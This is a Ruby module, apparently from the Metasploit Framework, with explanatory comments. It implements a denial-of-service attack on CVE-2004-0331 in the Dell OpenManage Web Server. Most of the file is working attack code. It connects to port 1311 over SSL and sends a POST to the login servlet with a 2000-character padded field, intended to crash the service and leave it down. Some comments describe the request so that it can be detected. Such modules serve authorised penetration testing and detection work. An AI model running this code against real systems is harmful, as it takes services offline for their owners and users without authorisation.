GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/dell_openmanage_post.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary denial-of-service module for CVE-2004-0331, a heap overflow in the
# POST handling of the Dell OpenManage Web Server (omws32.exe, versions
# 3.2-3.7.1 per the module description).
#
# What it puts on the wire (useful when writing a detection or reviewing logs):
# a single HTTP/1.0 POST to /servlet/LoginServlet?flag=true whose form body has
# fixed placeholder credentials and an `application` field followed by 2000
# generated characters. The default destination is TCP 1311 with the SSL
# option enabled, so the request is normally wrapped in TLS.
#
# 'Stability' is declared as CRASH_SERVICE_DOWN: the module expects the web
# server to go down and stay down.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata (name, description, references, stability notes)
  # and the module's datastore options.
  #
  # @param info [Hash] metadata supplied by the framework; merged with the
  #   values below through update_info.
  def initialize(info = {})
    module_details = {
      'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',
      'Description' => %q{
          This module exploits a heap overflow in the Dell OpenManage
          Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
          exists due to a boundary error within the handling of POST requests,
          where the application input is set to an overly long file name.
          This module will crash the web server, however it is likely exploitable
          under certain conditions.
        },
      'Author' => [ 'aushack' ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ],
        [ 'BID', '9750' ],
        [ 'OSVDB', '4077' ],
        [ 'CVE', '2004-0331' ],
      ],
      'DisclosureDate' => '2004-02-26',
      # SideEffects and Reliability are declared empty; only the stability
      # impact (service left down) is recorded for this module.
      'Notes' => {
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [],
        'Reliability' => []
      }
    }

    super(update_info(info, module_details))

    # Default target is port 1311 with SSL required and defaulting to true.
    # NOTE(review): the SSL option is presumably consumed by the Tcp mixin's
    # connect; this file does not read it directly.
    register_options([
      Opt::RPORT(1311),
      OptBool.new('SSL', [true, 'Use SSL', true]),
    ])
  end

  # Opens one connection, sends the oversized login POST, and disconnects.
  #
  # No response is read and the service state is not checked afterwards, so a
  # completed run only means the request was written to the socket.
  def run
    connect

    # Form body: fixed placeholder credentials plus the `application` field
    # padded with a 2000-character generated pattern.
    post_body = 'user=user&password=password&domain=domain&application=' + Rex::Text.pattern_create(2000)

    # Content-Length covers post_body only; the trailing "\r\n\r\n" is sent
    # after it, outside the declared length.
    request = [
      "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n",
      "Content-Length: #{post_body.length}\r\n\r\n",
      post_body,
      "\r\n\r\n"
    ].join

    sock.put(request)

    disconnect
  end
end